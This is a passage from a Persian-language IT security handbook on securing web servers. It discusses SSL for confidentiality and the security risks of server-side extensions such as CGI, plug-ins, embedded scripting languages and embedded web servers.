‫ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻣﻜﺎﻧﺎﺕ ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻢ‪ ،‬ﻓﺮﻣﺎﻥ ‪ su‬ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﺩﺭ ﻫﺮﺻﻮﺭﺕ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ‪ ،‬ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﺎﺹ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﻤﺘﺮﻳﻦ ﺁﻧﻬﺎ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺣﻔـﻆ ﻣﺤﺮﻣـﺎﻧﮕﻲ‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺻﺤﺖ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﻤﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‪ ،‬ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﺤﺘﻮﺍ‪.‬‬

‫ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﮔﺮ ﻗﺮﺍﺭ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﺭﺍ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻴﺪ‪ ،‬ﻳﻚ ﮔﻮﺍﻫﻲ ‪ SSL‬ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺑﻲ ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻛﻪ‬
‫ﻗﺎﺑﻠﻴﺖ ‪ SSL‬ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻫﻢ ‪ Apache‬ﻭ ﻫـﻢ ‪ IIS‬ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑﮕﻮﻧـﻪﺍﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﺷـﻮﻧﺪ ﻛـﻪ ﺍﺯ ‪ SSL‬ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ(‪ .‬ﺍﮔـﺮ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﻳـﻚ‬
‫‪ interanet‬ﻃﺮﺍﺣﻲ ﻛﻨﻴﺪ )ﻳﺎ ﻳﻚ ‪ internet‬ﻛﻪ ﺑﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﻛﺎﺭﻣﻨﺪﺍﻧﺘﺎﻥ ﻣﺤﺪﻭﺩ ﻣﻲﺷﻮﺩ(‪ ،‬ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﻳـﻚ ﮔـﻮﺍﻫﻲ ‪ SSL‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻼ ﻳﻚ ﺭﻭﺵ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﻳـﺪ‪ .‬ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ‬ ‫ﻛﻨﻴﺪ ﻛﻪ ﺗﻮﺳﻂ ﺧﻮﺩﺗﺎﻥ ﺑﻪ ﺍﻣﻀﺎ ﺭﺳﻴﺪﻩ‪ ،‬ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﺍﺻ ﹰ‬
‫ﻗﺎﻋﺪﺗﹰﺎ ﻣﺠﺒﻮﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﮔﻮﺍﻫﻲ ‪ SSL‬ﺭﺍ ﺍﺯ ﻣﺮﺍﻛﺰ ﻣﻌﺘﺒﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﺜﻞ ‪ - VeriSign‬ﻛﻪ ﮔﻮﺍﻫﻲﻫـﺎﻱ ﺍﻣـﻀﺎﺷﺪﺓ ﺁﻥ ﺩﺭ ﺑﻴـﺸﺘﺮ‬
‫ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻣﻌﺮﻭﻑ ﻭﺏ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ‪ -‬ﺑﺨﺮﻳﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﮔﻮﺍﻫﻲﻫﺎﻱ ‪ SSL‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻓـﺼﻞ ﭼﻬـﺎﺭﻡ ﺍﺯ ﻫﻤـﻴﻦ‬
‫ﺑﺨﺶ ﺭﺟﻮﻉ ﻧﻤﺎﻳﻴﺪ‪.‬‬

‫‪212 Non-Anonymous FTP Service‬‬


‫‪٣٥٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺍﮔﺮ ﺍﺯ ‪ SSL‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ‪ ،‬ﺗﻤﺎﻡ ﺍﻧﺘﻘﺎﻻﺕ ‪ - HTTP‬ﺷﺎﻣﻞ ﻧﺎﻣﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻛـﻪ ﺩﺭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺍﺑﺘـﺪﺍﻳﻲ‬
‫‪ HTTP‬ﻭ ﻳﺎ ﻫﺮ ﻧﻮﻉ ﻓﺮﻣﻲ ﻛﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﻣﻨﺘﻘﻞ ﻣﻲﻛﻨﺪ ‪ -‬ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱﻧﺸﺪﻩ ﺍﻧﺠﺎﻡ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﺩﺭ ﺑﻴـﺸﺘﺮ ﻣـﻮﺍﺭﺩ ﺍﮔـﺮ‬
‫ﺑﺨﻮﺍﻫﻴﺪ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﻴﺪ‪ ،‬ﭼﺎﺭﻩﺍﻱ ﻧﺪﺍﺭﻳﺪ ﺟﺰ ﺍﻳﻨﻜﻪ ‪ SSL‬ﺭﺍ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﺎﻳﻴﺪ ﺗﺎ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ ﺣﻔﺎﻇﺖ ﺑﻌﻤـﻞ ﺁﻭﺭﺩﻩ‬
‫ﺑﺎﺷﻴﺪ‪.‬‬

‫ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﻤﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬


‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ ﻧﻤـﺎﻳﺶ ﺍﻃﻼﻋـﺎﺕ ﺛﺎﺑـﺖ ﻣﺎﻧﻨـﺪ ﺑﺮﻭﺷـﻮﺭﻫﺎ‪ ،‬ﭘﺎﺳـﺦ ﺑـﻪ ﭘﺮﺳـﺸﻬﺎﻱ ﻣﺘـﺪﺍﻭﻝ‪ ،‬ﻭ‬
‫ﻛﺎﺗﺎﻟﻮﮒﻫﺎﻱ ﻣﺤﺼﻮﻻﺕ ﺑﻮﺩﻧﺪ‪ ،‬ﺍﻣﺎ ﺑﺮﺍﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﻫﺮ ﻛﺎﺭﺑﺮ ﺑﺼﻮﺭﺕ ﺍﺧﺘﺼﺎﺻﻲ ﺗﻨﻈﻴﻤﺎﺗﻲ ﺩﺍﺷﺘﻨﺪ ﻭ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻗﺮﺍﺭ‬
‫ﺑﻮﺩ ﺑﻪ ﻧﻮﻋﻲ ﺩﺭ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ )ﻣﺜﻞ ﻛﺎﺭﺗﻬﺎﻱ ﺧﺮﻳﺪ(‪ ،‬ﻻﺯﻡ ﺑﻮﺩ ﻛـﻪ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﻭﺏ‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﺗﻮﺳﻌﻪ ﭘﻴﺪﺍ ﻛﻨﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺩﺳﺘﻮﺭﺍﺕ ﺍﺧﺘﺼﺎﺻﻲ ﺭﺍ ﺑﺮﺍﻱ ﻫﺮ ﺗﻘﺎﺿﺎﻱ ﻧﻤﺎﻳﺶ ﺻﻔﺤﻪ‪ ،‬ﻳﻜﺒﺎﺭ ﺑﻪ ﺍﺟـﺮﺍ ﺩﺭ ﺁﻭﺭﺩ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ‬
‫ﻻ ﺑﺼﻮﺭﺕ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻭﻗﺘﻲ ﻳﻚ ‪ URL‬ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭ‬ ‫ﺍﻳﻦ ﺩﺳﺘﻮﺭﺍﺕ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻲﺁﻳﻨﺪ‪ .‬ﻫﻴﭻ ﻣﺤﺪﻭﺩﻳﺘﻲ ﺭﻭﻱ ﺗﻮﺍﻧﺎﻳﻲ ﻳﻚ ﮔﺮﻭﻩ ﻗﻮﻱ ﺑﺮﻧﺎﻣـﻪﻧﻮﻳـﺴﻲ ﺩﺭ ﻛـﺎﺭ ﺑـﺎ ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ ﻭﺟـﻮﺩ ﻧـﺪﺍﺭﺩ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺣﺎﻭﻱ ﻧﻘﺎﻳﺼﻲ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺍﺟﺎﺯﻩ ﺩﻫـﺪ ﺑـﻪ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺭﻭﻱ ﺁﻥ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺍﺳﺖ ﺑﭙﺮﺩﺍﺯﻧﺪ‪ .‬ﺑﺪﺗﺮ ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﺍﮔﺮ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﻫﻤﺎﻥ ﺻﻮﺭﺕ ﻛﻪ‬
‫ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﻣﻲﺭﻭﺩ ﻋﻤﻞ ﻛﻨﺪ‪ ،‬ﺍﻳﻦ ﻧﻘﺎﻳﺺ ﺑﻨﺪﺭﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺷﻨﺎﺳﺎﻳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺳﻤﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‪ ،‬ﭼﻬﺎﺭ ﺗﻜﻨﻴﻚ ﺍﺻﻠﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬

‫‪CGI‬‬
‫‪٢١٣‬‬
‫‪ CGI‬ﺍﻭﻟﻴﻦ ﺍﺑﺰﺍﺭ ﮔﺴﺘﺮﺵ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺑﻮﺩ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ‪ URL‬ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﺑﺮﻧﺎﻣـﺔ ‪ CGI‬ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ‬
‫ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﺩ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺮﻧﺎﻣﺔ ‪ CGI‬ﻣﺬﻛﻮﺭ ﺭﺍ ﺩﺭ ﻳﻚ ﭘﺮﺩﺍﺯﺓ ﻣﺠﺰﺍ ﺍﺟﺮﺍ ﻣﻲﻧﻤﺎﻳﺪ‪ ،‬ﺧﺮﻭﺟﻲ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺩﺭﻳﺎﻓـﺖ ﻣـﻲﻛﻨـﺪ‪ ،‬ﻭ ﻧﺘـﺎﻳﺞ‬
‫ﺩﺭﺧﻮﺍﺳﺖﺷﺪﻩ ﺭﺍ ﺑﻪ ﻣﺮﻭﺭﮔﺮ ﻭﺑﻲ ﻛﻪ ﺁﻧﺮﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻛﺮﺩﻩ ﺑﻮﺩ ﻣﻲﻓﺮﺳﺘﺪ‪ .‬ﺁﺭﮔﻮﻣﺎﻧﻬﺎﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ‪ CGI‬ﺑﻌﻨـﻮﺍﻥ ﻣﺘﻐﻴﺮﻫـﺎﻱ ﻣﺤﻴﻄـﻲ‬
‫ﻛﺪﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﺜﻞ ﻭﺭﻭﺩﻱﻫﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ CGI‬ﻣﻲﺗﻮﺍﻧﻨﺪ ‪query‬ﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﻧﺪ ﻭ ﻧﺘﺎﻳﺞ ﺁﻧﺮﺍ ﻧﻤﺎﻳﺶ ﺩﻫﻨﺪ‪ ،‬ﺍﻓﺮﺍﺩ ﺭﺍ ﻗﺎﺩﺭ ﻛﻨﻨﺪ ﻛﻪ ﻣﺤﺎﺳﺒﺎﺕ ﭘﻴﭽﻴﺪﺓ‬
‫ﻣﺎﻟﻲ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ‪ ،‬ﻭ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻣﻜﺎﻥ ﺩﻫﻨﺪ ﻛﻪ ﺑﺎ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻣﺤﻴﻂ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﮔﻔﺘﮕﻮ ﺑﭙﺮﺩﺍﺯﻧﺪ‪ .‬ﺩﺭ ﻭﺍﻗﻊ ﺑﺎﻳﺪ ﮔﻔﺖ ﻛﻪ ﻫﺮ ﻗﺎﺑﻠﻴﺖ‬
‫ﻧﻮﺁﻭﺭﺍﻧﺔ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ ‪ -‬ﺍﺯ ﻣﻮﺗﻮﺭﻫﺎﻱ ﺟﺴﺘﺠﻮ ﮔﺮﻓﺘﻪ ﺗﺎ ﺻﻔﺤﺎﺕ ﻭﺑﻲ ﻛﻪ ﺍﺟﺎﺯﺓ ﺭﺩﻳﺎﺑﻲ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﻣﻲﺩﻫﻨﺪ ‪ -‬ﺩﺭ ﺍﺑﺘﺪﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ CGI‬ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺑﻮﺩﻧﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫‪٢١٥‬‬
‫‪Plug-in‬ﻫﺎ‪Module ،‬ﻫﺎﻱ ﻗﺎﺑﻞ ﺑﺎﺭﮔﺬﺍﺭﻱ‪ ٢١٤،‬ﻭ ﻭﺍﺳﻄﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﺍﻱ )‪API‬ﻫﺎ(‬
‫ﻻ ﺑﻪ ﺯﺑﺎﻧﻬﺎﻱ ‪C‬‬
‫ﺩﻭﻣﻴﻦ ﺗﻜﻨﻴﻜﻲ ﻛﻪ ﺑﺮﺍﻱ ﺗﻮﺳﻌﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪ ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ‪module‬ﻫﺎﻳﻲ ﺑﻮﺩ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻳﺎ ‪ C++‬ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺑﻮﺩﻧﺪ‪ .‬ﺍﻳﻦ ‪module‬ﻫﺎ ﺩﺭ ﺯﻣﺎﻥ ﺍﺟﺮﺍ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ‪Plug-in .‬ﻫﺎ‪module ،‬ﻫﺎ‪ ،‬ﻭ‬
‫‪API‬ﻫﺎ ﺭﺍﻩ ﺳﺮﻳﻊﺗﺮﻱ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﻫﺴﺘﻨﺪ‪ ،‬ﭼﻮﻥ ﺩﺭﺻﻮﺭﺕ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﻧﻴﺎﺯﻱ ﻧﻴﺴﺖ ﻛﻪ ﺑﻪ ﺍﺯﺍﻱ ﻫﺮ ﺗﻌﺎﻣﻞ ﻭﺏ ﻳﻚ ﭘﺮﺩﺍﺯﺓ ﺟﺪﻳﺪ ﺷﺮﻭﻉ ﺷﻮﺩ ﻭ ﺩﺭﻋﻮﺽ ﺧﻮﺩ ﭘـﺮﺩﺍﺯﺓ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ‪ ،‬ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﺱ ﺧﻮﺩ ﺁﻥ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻭﺭﺩ‪ .‬ﺍﻣﺎ ﺍﻳﻦ ﺗﻜﻨﻴﻜﻬﺎ ﻳﻚ ﻧﻘﺺ ﺑﺎﺭﺯ ﺩﺍﺭﻧﺪ‪ :‬ﺑﺮﻧﺎﻣﺔ ‪ plug-in‬ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺩﺭ ﻓﻀﺎﻱ ﺁﺩﺭ ﹺ‬
‫ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﻭ ﻭﺟﻮﺩ ﺗﻨﻬﺎ ﻳﻚ ﺍﺷﻜﺎﻝ ﺩﺭ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺒﺐ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻥ ﻛﻞ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﮔﺮﺩﺩ‪.‬‬

‫‪213 Common Gateway Interface‬‬


‫‪214 Loadable Modules‬‬
‫‪215 Application Programming Interfaces‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٦٠‬‬

‫‪٢١٦‬‬
‫ﺯﺑﺎﻧﻬﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺯ ﭘﻴﺶ ﺗﻌﺒﻴﻪﺷﺪﻩ‬
‫ﺍﺑﺪﺍﻉ ﺯﺑﺎﻧﻬﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﺍﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻭﺏ ﺳﻮﻣﻴﻦ ﺗﻜﻨﻴﻜﻲ ﺑﻮﺩ ﻛﻪ ﺑﻤﻨﻈﻮﺭ ﺍﻓﺰﻭﺩﻥ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﻪ ﺻﻔﺤﺎﺕ ﻭﺏ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻻ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﻧﺪ ‪-‬‬ ‫ﻗﺮﺍﺭ ﮔﺮﻓﺖ‪ .‬ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻮﭼﻜﻲ ‪ -‬ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺩﺭ ﺻﻔﺤﺔ ﻭﺏ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ ،‬ﻭ ﺳﭙﺲ ﻳﻚ ﻣﻔﺴﺮ ﺩﺭﻭﻧﻲ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺻﻔﺤﺎﺕ ﻭﺏ ﺭﺍ ﭘﻴﺶ ﺍﺯ‬
‫ﻓﺮﺳﺘﺎﺩﻥ ﺻﻔﺤﺔ ﻣﺰﺑﻮﺭ ﺑﺮﺍﻱ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﺍﺟﺮﺍ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﺳﺮﻳﻊ ﺑﺎﺷﻨﺪ‪ .‬ﻣﺜﺎﻟﻬﺎﻳﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻋﺒﺎﺭﺗﻨـﺪ‬
‫ﺍﺯ ‪ ASP‬ﺷﺮﻛﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ‪ JavaScript ،PHP ،‬ﺳﻤﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‪ ،‬ﻭ ‪.mod-perl‬‬
‫‪٢١٧‬‬
‫ﺏ ﺍﺯ ﭘﻴﺶ ﺗﻌﺒﻴﻪﺷﺪﻩ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭ ﹺ‬
‫ﺑﺎﻻﺧﺮﻩ ﺍﻳﻨﻜﻪ ﺑﺮﺧﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻄﻮﺭ ﻛﻞ ﺑﺎ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻛﺎﺭﻱ ﻧﺪﺍﺭﻧﺪ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺧﺘـﺼﺎﺻﻲ ‪ HTTP‬ﺧـﻮﺩ ﺭﺍ ﺭﻭﻱ‬
‫ﺏ ﺧﻮﺩ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻭﺭﻧﺪ‪.‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻭ ﹺ‬
‫ﺗﻜﻨﻴﻜﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺠﺎ ﺑﺮ ﺷﻤﺮﺩﻳﻢ ﺑـﺪﻟﻴﻞ ﺗﻮﺍﻧﻤﻨـﺪﻳﻬﺎﻳﻲ ﻛـﻪ ﺩﺍﺭﻧـﺪ‪ ،‬ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﻣﻨﻴـﺖ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ ﻭ ﻣﻴﺰﺑـﺎﻧﻲ ﻛـﻪ ﺍﻳـﻦ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﺭﺍ ﺑﻪ ﻣﺨﺎﻃﺮﺓ ﺟﺪﻱ ﺑﻴﺎﻧﺪﺍﺯﻧﺪ؛ ﭼﻮﻥ ﺑﺼﻮﺭﺕ ﺑﺎﻟﻘﻮﻩ ﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻦ ﻭﺍﺳﻄﻪﻫـﺎ‬
‫ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﺪ ‪ -‬ﺣﺘﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺭﻧﺪ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺑـﻪ ﺍﻓـﺮﺍﺩ ﺑﻴﺮﻭﻧـﻲ ﺍﺟـﺎﺯﺓ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺭﺍ‬
